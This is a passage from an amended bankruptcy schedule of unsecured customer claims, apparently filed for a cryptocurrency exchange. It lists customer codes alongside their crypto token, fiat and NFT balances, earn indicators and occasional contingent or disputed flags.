Round 1 Commemorative Ticket #373)[1], NFT (553504250711576191/GSW Round 1 Commemorative Ticket #591)[1], NFT (567265403518257968/GSW Western Conference Finals Commemorative Banner #371)[1], NFT (572470151443749716/Warriors Hoop #254 (Redeemed))[1], USD[6.79] | | |
| 07379931 | | BRZ[2], CUSDT[14], DOGE[1], USD[0.01], USDT[1] | | |
| 07379932 | | USD[10.00] | | |
| 07379933 | | CUSDT[7], DOGE[.00002631], SOL[.80144855], USD[16.07] | | |
| 07379934 | | USD[10.00] | | |
| 07379936 | | BTC[.00023289], CUSDT[1], ETH[.00281088], ETHW[.00281088], USD[0.01] | | |
| 07379937 | | DOGE[0], ETH[.00171399], ETHW[.00168661], USD[0.00], USDT[0] | Yes | |
| 07379939 | | USD[10.00] | | |
| 07379940 | | BAT[8.88038112], BRZ[7.72948397], CUSDT[10], DOGE[1], GRT[1.00498957], LINK[2.22009534], SUSHI[1.10979428], UNI[3.33014305], USD[0.00], USDT[13.32057169] | Yes | |
| 07379941 | | BAT[1.00972734], BRZ[1], BTC[.01522222], CUSDT[15], DOGE[19322.32690745], GRT[1], LTC[12.93194693], SHIB[3], TRX[15117.20053502], USD[-199.99] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07379942 | | USD[10.00] | | |
| 07379943 | | USD[10.00] | | |
| 07379944 | | BCH[.04338776], DOGE[1], GRT[4.91729275], TRX[1], USD[0.61] | | |
| 07379946 | | BAT[0], BTC[0], CUSDT[4], DOGE[0], ETH[0], SUSHI[0], USD[0.00] | | |
| 07379948 | | BCH[0], BTC[0], GRT[.30214305], USD[0.00], USDT[0] | Yes | |
| 07379949 | | USD[0.00] | | |
| 07379950 | | USD[10.00] | | |
| 07379951 | | USD[10.00] | | |
| 07379953 | | DOGE[7.09850583], SHIB[4], USD[0.01] | | |
| 07379954 | | CUSDT[5], ETH[0], USD[0.00] | Yes | |
| 07379955 | | BCH[.16318326], CUSDT[1], DOGE[2], ETH[0.00661042], ETHW[0.00661042], USD[0.00] | | |
| 07379957 | | SOL[50.64346203], USD[5505.30], USDT[0] | Yes | |
| 07379958 | | USD[10.00] | | |
| 07379959 | | USD[10.00] | | |
| 07379960 | | CUSDT[18], KSHIB[251.06568039], MATIC[.00009196], SHIB[1019977.44509402], USD[0.00], USDT[0] | Yes | |
| 07379961 | | DOGE[.00000343], USD[0.00] | Yes | |
| 07379963 | | DOGE[190.96043487], USD[0.00] | | |
| 07379964 | | DOGE[175.01659157], USD[0.00] | | |
| 07379965 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07379966 | | USD[10.00] | | |
| 07379967 | | BRZ[1], DOGE[6.10150914], TRX[52.11930699], USD[0.00], USDT[0] | Yes | |
| 07379968 | | BTC[.00021203], USD[0.00] | | |
| 07379969 | | USD[10.00] | | |
| 07379970 | | USD[10.00] | | |
| 07379972 | | USD[300.69] | | |
| 07379973 | | TRX[1], USD[0.00] | | |
| 07379974 | | USD[10.00] | | |
| 07379975 | | BAT[54.56593153], BRZ[30.31826278], CUSDT[263.28690716], KSHIB[139.73014197], TRX[585.98242062], USD[0.00], USDT[0] | Yes | |
| 07379976 | | USD[10.00] | | |
| 07379977 | | USD[0.01] | Yes | |
| 07379978 | | BRZ[6.02170632], CUSDT[11], DOGE[3], SHIB[1], TRX[5], USD[0.00] | | |
| 07379979 | | BRZ[547.35398318], CUSDT[3786.23163488], DOGE[2658.87415447], KSHIB[2562.47856593], SOL[10.97274221], SUSHI[6.94346558], TRX[2], USD[0.00] | | |
| 07379980 | | CUSDT[2], DOGE[747.3131666], ETH[.02396076], ETHW[.02396076], USD[0.00] | | |
| 07379983 | | SUSHI[0], USD[0.00] | | |
| 07379984 | | CUSDT[4], DOGE[1], TRX[1230.89465555], USD[0.00] | Yes | |
| 07379985 | | USD[10.00] | | |
| 07379986 | | CUSDT[1], KSHIB[1126.30877079], SHIB[2], USD[0.12] | | |
| 07379987 | | CUSDT[1], DOGE[0], ETH[0], SHIB[4559.19985005], USD[0.00], USDT[0] | Yes | |
| 07379988 | | USD[10.00] | | |
| 07379989 | | USD[10.00] | | |
| 07379990 | | USD[10.00] | | |
| 07379991 | | BTC[0], CUSDT[1], DOGE[44.80001656], LTC[.23693511], SHIB[157309.23841939], USD[0.00], USDT[0] | Yes | |
| 07379992 | | BTC[.00199796], CUSDT[3], DOGE[2352.71799445], ETH[.04107176], ETHW[.04107176], GRT[47.56182449], LINK[3.67342889], SOL[2.81608766], TRX[2], USD[0.00] | | |
| 07379993 | | BTC[.00213373], DOGE[1], TRX[1], USD[0.00] | | |
| 07379994 | | CUSDT[1], DOGE[0], ETH[0], LTC[0], USD[0.00] | | |
| 07379995 | | SHIB[1], USD[0.00] | Yes | |
| 07379996 | | USD[10.00] | | |
| 07379997 | | BAT[1], CUSDT[2], DOGE[5359.03977071], ETH[.43756126], ETHW[.43756126], SHIB[8784258.60857343], TRX[1], USD[0.00] | | |
| 07379998 | | BRZ[1], DOGE[.00009931], TRX[1], USD[0.00] | | |
| 07379999 | | BTC[0], ETH[0], SOL[0.00000001], TRX[0], USD[0.00], USDT[0] | | |
| 07380000 | | BTC[.00064316], CUSDT[2], DOGE[168.5305052], USD[6.67] | | |
| 07380001 | | DOGE[1235.97398942], SUSHI[1.51839541], USD[0.00] | | |
| 07380002 | | CUSDT[2], DOGE[.00586758], GRT[.00005696], USD[0.00] | | |
| 07380003 | | CUSDT[1], DOGE[8], TRX[1], USD[0.00] | | |
| 07380004 | | USD[20.00] | | |
| 07380005 | | BTC[0], ETH[0], ETHW[0], LTC[0], MATIC[0], SHIB[0], SOL[0], USD[0.01], USDT[0.00000024] | | |
| 07380006 | | USD[10.00] | | |
| 07380007 | | CUSDT[1], DOGE[87.62237126], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07380008 | | USD[10.00] | | |
| 07380010 | | USD[10.00] | | |
| 07380013 | | BTC[.0086078], DOGE[1314.2374106], SHIB[24687133.73947799], USD[0.00] | Yes | |
| 07380014 | | DOGE[3229.19646133], TRX[1269.08563846], USD[0.00] | | |
| 07380015 | | DOGE[16.37363702], USD[0.00] | | |
| 07380017 | | CUSDT[2], DOGE[1864.2060621], GRT[79.03539671], SUSHI[9.59253866], TRX[6520.75116146], USD[0.00] | | |
| 07380019 | | CUSDT[6], TRX[1], USD[0.00] | Yes | |
| 07380020 | | SHIB[299977.47595559], USD[0.00] | | |
| 07380021 | | DOGE[0], ETH[0], TRX[0], UNI[0], USD[0.00], YFI[0] | | |
| 07380022 | | BAT[1], BRZ[1], BTC[0], TRX[1], USD[0.00] | | |
| 07380023 | | USD[10.00] | | |
| 07380025 | | USD[10.00] | | |
| 07380026 | | BAT[1], DOGE[2], GRT[2], TRX[2], USD[0.00], USDT[1.02543197] | Yes | |
| 07380027 | | USD[10.00] | | |
| 07380028 | | DOGE[22.96981039], USD[28.00] | | |
| 07380029 | | BTC[.00017529], USD[0.00] | | |
| 07380030 | | BRZ[1], CUSDT[5], USD[0.76] | | |
| 07380031 | | USD[10.00] | | |
| 07380032 | | DOGE[10], GRT[0.08252102], SOL[.00944491], SUSHI[.00052687], TRX[.00002037], USD[0.00] | | |
| 07380033 | | USD[10.00] | | |
| 07380034 | | BF_POINT[200], BTC[.00001414], CUSDT[2], DOGE[7.3530748], ETH[.00008179], ETHW[.00008179], LINK[.74702323], LTC[0.00935516], MATIC[.1345343], PAXG[.00055337], SHIB[22977.94117647], SOL[0.00223819], SUSHI[.02302325], TRX[1.36280576], UNI[1.07918942], USD[0.00], YFI[.00004178] | Yes | |
| 07380035 | | CUSDT[2], DOGE[248.13718195], TRX[123.30131946], USD[101.91] | | |
| 07380036 | | USD[10.00] | | |
| 07380037 | | DOGE[141.51036846], USD[0.00] | | |
| 07380038 | | CUSDT[1], USD[0.00] | | |
| 07380039 | | USD[10.00] | | |
| 07380040 | | CUSDT[2], DOGE[1], USD[21.78] | | |
| 07380041 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07380043 | | USD[10.00] | | |
| 07380045 | | USD[10.00] | | |
| 07380046 | | BAT[1], BRZ[3], BTC[0], CUSDT[2], DOGE[7116.0357941], GRT[2], TRX[2], USD[354.04] | | |
| 07380047 | | DOGE[216.43854474], SHIB[931260.82886037], TRX[212.94715753], USD[0.00] | Yes | |
| 07380048 | | DOGE[0], LINK[0], LTC[0], SHIB[17753.51191601], SUSHI[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07380049 | | USD[10.00] | | |
| 07380051 | | USD[0.01], USDT[0] | | |
| 07380052 | | LTC[0], SUSHI[0] | | |
| 07380053 | | USD[10.00] | | |
| 07380054 | | USD[10.00] | | |
| 07380055 | | USD[10.00] | | |
| 07380056 | | USD[10.00] | | |
| 07380057 | | USD[0.00] | | |
| 07380058 | | USD[10.00] | | |
| 07380059 | | USD[10.00] | | |
| 07380060 | | SOL[.88521809], USD[0.00] | | |
| 07380061 | | DOGE[139.09652909], USD[0.00] | | |
| 07380063 | | CUSDT[1], DOGE[.75641365], USD[4.12] | | |
| 07380065 | | USD[0.03] | | |
| 07380066 | | USD[0.00] | | |
| 07380067 | | USD[10.00] | | |
| 07380069 | | USD[10.00] | | |
| 07380070 | | USD[10.00] | | |
| 07380071 | | BTC[0], SOL[0], TRX[3.37540188], USD[0.00], USDT[0.00000001] | Yes | |
| 07380072 | | USD[10.00] | | |
| 07380073 | | DOGE[1], USD[60.01] | | |
| 07380074 | | DOGE[121.48073352], USD[0.00] | | |
| 07380076 | | DOGE[166.70909413], USD[0.00] | | |
| 07380078 | | USD[11.06] | Yes | |
| 07380079 | | TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07380080 | | USD[7.70] | | |
| 07380081 | | BAT[1.0165555], BRZ[1], DOGE[8834.21891037], SOL[.0000245], TRX[1], USD[0.01], USDT[1.09926172] | Yes | |
| 07380082 | | USD[10.00] | | |
| 07380083 | | USD[10.00] | | |
| 07380085 | | ETH[.00000389], ETHW[.00000389], USD[0.00] | | |
| 07380086 | | USD[10.00] | | |
| 07380087 | | BRZ[1], CUSDT[1], USD[0.00], USDT[0.00006447] | | |
| 07380088 | | BTC[0], LTC[0], TRX[177.76977998], USD[0.00] | | |
| 07380090 | | DOGE[1], USD[0.00] | | |
| 07380091 | | CUSDT[2], DOGE[4], USD[0.00] | | |
| 07380092 | | CUSDT[3], SHIB[1], TRX[2], USD[0.01] | | |
| 07380093 | | USD[10.00] | | |
| 07380094 | | CUSDT[1], DOGE[1363.75637419], TRX[70.47869978], USD[0.00] | | |
| 07380095 | | DOGE[156.77750382], USD[2.03] | | |
| 07380096 | | USD[10.00] | | |
| 07380097 | | DOGE[1.00067553], USD[0.01] | | |
| 07380098 | | BAT[0.97463273], BTC[0], DOGE[0], ETH[0], GRT[0], USD[0.00], USDT[0] | Yes | |
| 07380099 | Contingent, Disputed | CUSDT[1], DOGE[0], ETH[0], USD[0.02] | | |
| 07380100 | | DOGE[134.73633379], USD[0.00] | | |
| 07380101 | | USD[10.00] | | |
| 07380103 | | BTC[0], USD[0.00] | Yes | |
| 07380104 | | BTC[.00126242], CUSDT[948.11765351], DOGE[942.64907853], TRX[272.15812993], USD[0.00] | | |
| 07380105 | | USD[10.00] | | |
| 07380107 | | SHIB[8], TRX[1364.69547844], USD[0.00] | Yes | |
| 07380108 | | USD[10.00] | | |
| 07380109 | | USD[10.00] | | |
| 07380111 | | USD[10.00] | | |
| 07380112 | | DOGE[138.21034895], USD[0.00] | | |
| 07380113 | | USD[0.00] | | |
| 07380114 | | USD[0.01], USDT[0] | Yes | |
| 07380115 | | USD[10.00] | | |
| 07380116 | | CUSDT[707.63191173], DOGE[663.76825686], TRX[722.06011991], USD[0.00] | | |
| 07380118 | | BTC[.00250579], CUSDT[10], DOGE[6101.79690241], NFT (301107856050236130/AI-generated landscape #104)[1], NFT (311178237581846104/AI-generated landscape #103)[1], TRX[5576.2131067], USD[0.00] | Yes | |
| 07380119 | | USD[0.01] | | |
| 07380120 | | CUSDT[6], DOGE[583.97812046], SHIB[1799703.34003898], TRX[1], USD[0.00] | Yes | |
| 07380121 | | DOGE[2.78852254], USD[0.00] | | |
| 07380122 | | BTC[0.00010014], DOGE[213.19423542], USD[0.00] | | |
| 07380123 | | BF_POINT[300], DOGE[0], ETH[0], GRT[0], LTC[0], SOL[0], SUSHI[.00000001], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07380124 | | USD[10.00] | | |
| 07380125 | | CUSDT[1], DOGE[202.78366541], TRX[1], USD[0.00] | | |
| 07380126 | | BRZ[1], CUSDT[2], DOGE[1.00008778], TRX[1], USD[0.00] | | |
| 07380127 | | DOGE[1406.62850305], ETH[.18805343], ETHW[.18805343], TRX[1], USD[0.00] | | |
| 07380128 | | USD[10.00] | | |
| 07380131 | | CUSDT[13494.89978256], DOGE[1265.39937403], LINK[10.16638426], TRX[5401.44044257], UNI[7.49378418], USD[291.60] | Yes | |
| 07380132 | | USD[10.00] | | |
| 07380133 | | USD[10.00] | | |
| 07380134 | | DOGE[87.2758527], USD[0.00] | | |
| 07380135 | | USD[10.00] | | |
| 07380136 | | USD[10.00] | | |
| 07380137 | | DOGE[6298.42907] | | |
| 07380138 | | CUSDT[3], USD[0.01] | | |
| 07380139 | | TRX[1], USD[10.00] | | |
| 07380141 | | USD[10.00] | | |
| 07380142 | | BRZ[3], CUSDT[6], DOGE[1], GRT[1], TRX[10], USD[0.00], USDT[1] | | |
| 07380144 | | GRT[5.15450677], USD[0.00] | | |
| 07380145 | | USD[0.01] | | |
| 07380146 | | CUSDT[5], DOGE[1], ETH[0.02945360], ETHW[0.02945360], TRX[2], USD[0.01] | | |
| 07380147 | | CUSDT[471.85591785], USD[0.00] | | |

Amended Schedule F nonpriority Unsecured Customer Claims

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07380148 | | USD[10.00] | | |
| 07380149 | | USD[0.00] | | |
| 07380151 | | USD[10.00] | | |
| 07380152 | | USD[10.00] | | |
| 07380157 | | GRT[9.01436029], USD[0.00] | | |
| 07380159 | | USD[0.00] | Yes | |
| 07380161 | | USD[0.00], USDT[0] | Yes | |
| 07380162 | | DOGE[694.24976523], TRX[1], USD[10.00] | | |
| 07380163 | | USD[10.00] | | |
| 07380164 | | ETH[.000609], ETHW[.000609], USD[0.12] | | |
| 07380165 | | BTC[.02879562], CUSDT[3], DOGE[977.7802209], MATIC[67.29393192], TRX[1], USD[0.01] | Yes | |
| 07380167 | | KSHIB[369.73333353], USD[0.00] | | |
| 07380168 | | USD[10.00] | | |
| 07380169 | | BRZ[1], BTC[.010165533], CUSDT[1], DOGE[3.00054800], TRX[3], USD[0.00] | Yes | |
| 07380170 | | CUSDT[2], DOGE[80.0403253], ETH[.00788019], ETHW[.00778443], USD[0.59] | Yes | |
| 07380171 | | BRZ[0], BTC[0], CUSDT[0], DAI[0], ETH[0], ETHW[0], GRT[0], LTC[0], SOL[0], SUSHI[0], USD[0.00], USDT[0] | Yes | |
| 07380172 | | DOGE[123.73697034], USD[0.00] | | |
| 07380173 | | BAT[0], BRZ[0], BTC[0], DOGE[0], GRT[0], SOL[0], TRX[0], USD[0.00] | | |
| 07380175 | | USD[10.00] | | |
| 07380176 | | USD[0.00] | | |
| 07380177 | | BTC[0.43531574], DOGE[89029.94711634], GRT[1.0034068], SHIB[427921876.90597206], SUSHI[1.07698489], TRX[1], USD[0.00], USDT[1.07742176] | Yes | |
| 07380178 | | USD[10.00] | | |
| 07380179 | | USD[10.00] | | |
| 07380180 | | USD[10.00] | | |
| 07380181 | | USD[10.00] | | |
| 07380182 | | USD[10.00] | | |
| 07380183 | | USD[10.00] | | |
| 07380184 | | BRZ[1], DOGE[16880.79774427], TRX[1], USD[0.00] | | |
| 07380185 | | USD[10.00] | | |
| 07380187 | | USD[10.00] | | |
| 07380188 | Contingent, Disputed | BTC[0], DAI[0], ETH[0], LINK[0], TRX[13.39490265], USD[0.00], USDT[0] | Yes | |
| 07380189 | | USD[10.00] | | |
| 07380190 | | USD[10.00] | | |
| 07380191 | | USD[10.00] | | |
| 07380192 | | BTC[.00093334], DOGE[264.53772162], ETH[.01259565], ETHW[.00357079], SHIB[13020275.05715278], USD[0.00], USDT[0] | Yes | |
| 07380194 | | BCH[.0142946], USD[0.00] | | |
| 07380195 | | USD[21.55] | | |
| 07380197 | | USD[10.00] | | |
| 07380199 | | USD[10.00] | | |
| 07380200 | | DOGE[36.53386157], USD[0.00] | | |
| 07380201 | | DOGE[1], USD[0.00] | | |
| 07380204 | | BRZ[54.62031019], DOGE[688.327644], USD[0.00] | | |
| 07380205 | | USD[10.00] | | |
| 07380206 | | USD[10.00] | | |
| 07380208 | | SOL[.89099999], USD[0.00] | | |
| 07380209 | | BTC[0.00000017], DOGE[.00791082], TRX[0], USD[0.00] | | |
| 07380210 | | USD[10.00] | | |
| 07380211 | | USD[30.00] | | |
| 07380212 | | USD[10.00] | | |
| 07380214 | | USD[10.00] | | |
| 07380215 | | ETHW[.089], USD[0.00], USDT[0], WBTC[0] | | |
| 07380216 | | BAT[.46309095], DOGE[285.29950269], TRX[1], USD[0.00] | | |
| 07380217 | | USD[10.00] | | |
| 07380218 | | USD[10.00] | | |
| 07380219 | | USD[10.00] | | |
| 07380220 | | USD[10.00] | | |
| 07380221 | | USD[11.10] | Yes | |
| 07380222 | | BAT[0], BRZ[0], CUSDT[0], DOGE[0], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07380223 | | SOL[.00000001], TRX[0] | | |
| 07380224 | | BAT[0], BCH[0], BRZ[0], BTC[0], ETH[0], GRT[0], LINK[0], LTC[0], TRX[0], USD[0.00] | Yes | |
| 07380225 | | USD[10.00] | | |
| 07380226 | | USD[10.00] | | |
| 07380227 | | CUSDT[3], DOGE[.00001819], USD[0.00] | | |
| 07380228 | | BTC[0], CUSDT[1], DOGE[119.04903400], LINK[0], PAXG[0], TRX[.000268], USD[0.00] | | |
| 07380230 | | CUSDT[2], DOGE[11.22044591], USD[0.00] | | |
| 07380231 | | USD[10.00] | | |
| 07380232 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07380233 | | USD[0.00] | | |
| 07380234 | | BTC[.00002221], DOGE[12.51492404], ETH[.00054684], ETHW[.00054684], LTC[.00567117], USD[16.00] | | |
| 07380235 | | BCH[0], BRZ[5.00306760], BTC[0], CUSDT[11], DOGE[5], GRT[1], SUSHI[0], TRX[2], USD[0.00], USDT[3] | | |
| 07380237 | | USD[10.00] | | |
| 07380239 | | USD[10.00] | | |
| 07380240 | | SHIB[3950564.95577453], USD[0.00] | Yes | |
| 07380242 | | SOL[.05737437], USD[3.07] | Yes | |
| 07380243 | | USD[10.00] | | |
| 07380244 | | CUSDT[1], DOGE[85.08367539], USD[0.00] | | |
| 07380245 | | USD[10.00] | | |
| 07380246 | | MATIC[41.96561508], SHIB[2], USD[0.00] | | |
| 07380247 | | USD[10.00] | | |
| 07380248 | | ETH[.00548695], ETHW[.00548695], TRX[1], USD[0.00] | | |
| 07380249 | | BRZ[4], CUSDT[4], DOGE[2], SHIB[2], TRX[1], USD[0.00], USDT[1.02543197] | Yes | |
| 07380250 | | USD[10.00] | | |
| 07380251 | | TRX[163.39845251], USD[0.00] | | |
| 07380252 | | USD[0.00] | | |
| 07380253 | | BAT[1], BRZ[9.61906934], CUSDT[17], DOGE[4], LINK[1.07428897], MATIC[1.00266576], MKR[2.12863861], SHIB[1], SOL[206.14826306], TRX[1], UNI[1.07428897], USD[498.69], USDT[3.18914857] | Yes | |
| 07380255 | | USD[10.00] | | |
| 07380256 | | USD[10.00] | | |
| 07380257 | | BTC[.00073653], CUSDT[3], TRX[1], USD[0.00] | | |
| 07380258 | | BAT[1], CUSDT[19.46059936], DOGE[2040.05928049], TRX[1], USD[0.00] | | |
| 07380259 | | USD[10.00] | | |
| 07380260 | | USD[10.00] | | |
| 07380261 | | USD[10.00] | | |
| 07380262 | | USD[10.00] | | |
| 07380263 | | USD[10.00] | | |
| 07380264 | | USD[0.00] | | |
| 07380265 | | USD[10.00] | | |
| 07380266 | | USD[10.00] | | |
| 07380267 | | USD[0.00] | | |
| 07380268 | | BTC[0], TRX[0] | | |
| 07380269 | | USD[10.00] | | |
| 07380270 | | USD[10.00] | | |
| 07380271 | | BAT[1], BRZ[2], BTC[.00012927], CUSDT[5], DOGE[1], GRT[1], TRX[2], USD[0.00], USDT[1] | | |
| 07380272 | | BRZ[1], DOGE[1], USD[0.01] | | |
| 07380273 | | USD[0.00], USDT[0] | | |
| 07380274 | | BF_POINT[300], USD[0.01], USDT[0] | Yes | |
| 07380275 | | USD[10.00] | | |
| 07380276 | | USD[10.00] | | |
| 07380277 | | CUSDT[1], DOGE[.00335505], TRX[1], USD[9.64] | | |
| 07380279 | | USDT[0] | | |
| 07380280 | | TRX[211.08353187], USD[0.00] | | |
| 07380281 | | USD[10.00] | | |
| 07380282 | | TRX[1], USD[0.02] | Yes | |
| 07380284 | | DOGE[122.95230618], USD[0.00] | | |
| 07380285 | | CUSDT[466.56893602], USD[0.00] | | |
| 07380286 | | SOL[1.02336313], TRX[1], USD[0.00] | Yes | |
| 07380287 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07380289 | | USD[10.00] | | |
| 07380291 | | BAT[0], CUSDT[1], GRT[0], MATIC[3.31282660], SUSHI[0], TRX[0], USD[0.00] | | |
| 07380292 | | USD[10.00] | | |
| 07380294 | | USD[10.00] | | |
| 07380295 | | USD[10.00] | | |
| 07380296 | | BTC[0], GRT[0], USD[0.00], USDT[0.00000002] | | |
| 07380297 | | BTC[.00561146], DOGE[1], TRX[1], USD[0.00] | | |
| 07380299 | | USD[10.00] | | |
| 07380300 | | USD[10.00] | | |
| 07380301 | | CUSDT[3], DOGE[2], USD[0.00], USDT[61.96300245] | Yes | |
| 07380302 | | USD[10.00] | | |
| 07380305 | | DOGE[126.69120084], USD[0.00] | | |
| 07380306 | | USD[0.00] | | |
| 07380307 | | BTC[.00203947], CUSDT[1], DOGE[1], USD[0.03] | | |
| 07380308 | | ETH[.00539468], ETHW[.00539468], USD[0.00] | | |
| 07380310 | | CUSDT[1], TRX[.289084], USD[0.00] | | |
| 07380311 | | USD[10.00] | | |
| 07380312 | | CUSDT[5], USD[0.01] | | |
| 07380313 | | CUSDT[17], DOGE[3821.77346163], SHIB[1], TRX[32.45161239], USD[1.04] | Yes | |
| 07380314 | | BAT[1], CUSDT[2], DOGE[56030.96092798], SOL[27.50290005], USD[0.00] | Yes | |
| 07380315 | | USD[10.00] | | |
| 07380316 | | BTC[0], DOGE[1], TRX[0], USD[0.00] | | |
| 07380317 | | USD[10.00] | | |
| 07380318 | | USD[10.00] | | |
| 07380319 | | USD[0.06] | | |
| 07380320 | | DOGE[1], SHIB[774671.85391241], USD[0.00] | Yes | |
| 07380321 | | USD[10.00] | | |
| 07380323 | | USD[10.00] | | |
| 07380325 | | DOGE[31.85525177], USD[0.00] | | |
| 07380326 | | CUSDT[4.10801368], DOGE[130.16942246], USD[0.00] | | |
| 07380327 | | CUSDT[21], NFT (340685798042571332/Rogue Circuits #5088)[1], SHIB[2], SOL[0], TRX[1], USD[0.00] | Yes | |
| 07380329 | | USD[10.00] | | |
| 07380332 | | USD[10.00] | | |
| 07380333 | | BCH[.00017982], CUSDT[6], USD[0.06] | | |
| 07380334 | | USD[10.00] | | |
| 07380336 | | DOGE[1.15280658], ETH[.00000002], ETHW[.00000002], LTC[.01059312], USD[-0.31] | | |
| 07380337 | | USD[10.00] | | |
| 07380338 | | BTC[.00002726], DOGE[14.896], USD[4.82], USDT[0.03611198] | | |
| 07380339 | | USD[10.00] | | |
| 07380341 | | BAT[1], BCH[.20457956], BRZ[1], BTC[.00254116], CUSDT[69.56365425], DOGE[395.12566326], ETH[.21311026], ETHW[.21289424], GRT[5.98179811], KSHIB[1506.57857605], LTC[1.14465512], MATIC[71.56412694], NFT (367054000480202225/Entrance Voucher #2432)[1], SHIB[1000], SOL[13.26789148], TRX[2972.35128757], USD[0.00], USDT[0] | Yes | |
| 07380342 | | BAT[17868.07492292], BRZ[1], CUSDT[2], DOGE[1], ETH[3.12177618], ETHW[3.12056458], GRT[1.00265461], SOL[71.53098572], SUSHI[1.0784778], TRX[2], USD[11.79], USDT[1.07902883] | Yes | |
| 07380344 | | USD[10.00] | | |
| 07380345 | | USD[10.00] | | |
| 07380347 | | GRT[8.62044323], USD[0.00] | | |
| 07380348 | | DOGE[105.84910993], TRX[1], USD[5.01] | | |
| 07380349 | | BAT[2.00052981], BRZ[8.02985801], BTC[0.03000540], CUSDT[5], DOGE[1], ETH[0.42701548], ETHW[2.02657572], GRT[4.00093685], LINK[.00019968], SHIB[60901665.26415035], SOL[0], TRX[19.04761498], USD[0.17], USDT[0.000037671] | Yes | |
| 07380350 | | CUSDT[2], DOGE[18.47790638], USD[0.00] | | |
| 07380351 | | DOGE[647.70177163], USD[0.00] | | |
| 07380353 | | CUSDT[1], DOGE[1], USD[232.80] | | |
| 07380354 | | USD[10.00] | | |
| 07380355 | | USD[10.00] | | |
| 07380356 | | USD[0.00] | Yes | |
| 07380357 | | USD[10.00] | | |
| 07380358 | | BTC[0], USD[0.00] | | |
| 07380360 | | DOGE[1], GRT[7.21286477], USD[0.00] | | |
| 07380361 | | USD[0.00] | | |
| 07380362 | | BRZ[1], CUSDT[2], DOGE[116.28647193], ETH[.01759083], ETHW[.01759083], USD[0.01] | | |
| 07380363 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07380364 | | DOGE[126.55337945], USD[0.00] | | |
| 07380365 | | CUSDT[1], USD[0.00], USDT[0] | | |
| 07380366 | | USD[10.00] | | |
| 07380367 | | USD[10.00] | | |
| 07380368 | | BCH[0], BTC[0], CUSDT[1], DOGE[0], ETH[0.01309320], ETHW[0.01292904], USD[0.00] | Yes | |
| 07380369 | | DOGE[117.98488486], GRT[1], USD[0.00] | | |
| 07380373 | | BTC[.00150049], DOGE[122.16639311], SHIB[11747451.99139289], USD[0.00] | Yes | |
| 07380374 | | DOGE[1], TRX[2], USD[0.00] | | |
| 07380375 | | CUSDT[2], DOGE[74.02579044], USD[50.00] | | |
| 07380376 | | AAVE[0], BCH[0], BTC[0], CUSDT[15], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[0], LTC[0], MATIC[0], SOL[0], SUSHI[0], TRX[3], UNI[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07380377 | | CUSDT[1], ETH[0], TRX[1], USD[0.00] | Yes | |
| 07380379 | | DOGE[39.70417232], SHIB[823.61831079], TRX[0], USD[0.00] | Yes | |
| 07380380 | | CUSDT[1], DOGE[1.00000047], ETH[.01101434], ETHW[.01087754], USD[0.01] | Yes | |
| 07380381 | | CUSDT[3], USD[27.36] | | |
| 07380383 | | USD[10.00] | | |
| 07380384 | | CUSDT[1], DOGE[0.00000650], USD[69.31] | | |
| 07380385 | | USD[10.00] | | |
| 07380386 | | CUSDT[3], DOGE[447.86851741], TRX[1], USD[0.00] | | |
| 07380387 | | DOGE[2.02821177], USD[0.00] | | |
| 07380388 | | USD[10.00] | | |
| 07380389 | | USD[0.01] | | |
| 07380391 | | DOGE[.54], ETH[.00048], ETHW[.00048], USD[4.15] | | |
| 07380393 | | AVAX[2.68589639], CUSDT[1], DOGE[2], MATIC[0], SHIB[1], SOL[.00001107], USD[0.00] | Yes | |
| 07380394 | | CUSDT[2], DOGE[17.82932382], SOL[.09663985], USD[3.28] | Yes | |
| 07380395 | | USD[10.00] | | |
| 07380396 | | USD[10.00] | | |
| 07380397 | | BRZ[1], BTC[0], CUSDT[1], TRX[1], USD[0.99] | | |
| 07380398 | | BAT[1.0165555], BRZ[1], BTC[.00000002], CUSDT[6], DOGE[1], ETH[.00000051], ETHW[.05509685], GRT[2.03892284], SHIB[2], TRX[2], USD[0.01] | Yes | |
| 07380399 | | USD[0.00] | | |
| 07380400 | | BAT[0], BRZ[5.07952967], BTC[0], CUSDT[55.46707083], DOGE[1], TRX[0], USD[0.62], USDT[0] | Yes | |
| 07380401 | | CUSDT[1], USD[0.00] | | |
| 07380402 | | CUSDT[1], DOGE[1.00003531], USD[0.01] | | |
| 07380403 | | USD[10.00] | | |
| 07380404 | | USD[10.00] | | |
| 07380406 | | BCH[.02149235], CUSDT[1], USD[0.00] | | |
| 07380407 | | BAT[0], BTC[0], DOGE[0], USD[0.00], USDT[0] | | |
| 07380408 | | USD[10.00] | | |
| 07380409 | | USD[10.00] | | |
| 07380410 | | USD[10.00] | | |
| 07380411 | | BRZ[1], CUSDT[9], DOGE[244.01758106], TRX[1], USD[0.33] | | |
| 07380412 | | USD[10.00] | | |
| 07380413 | | USD[10.00] | | |
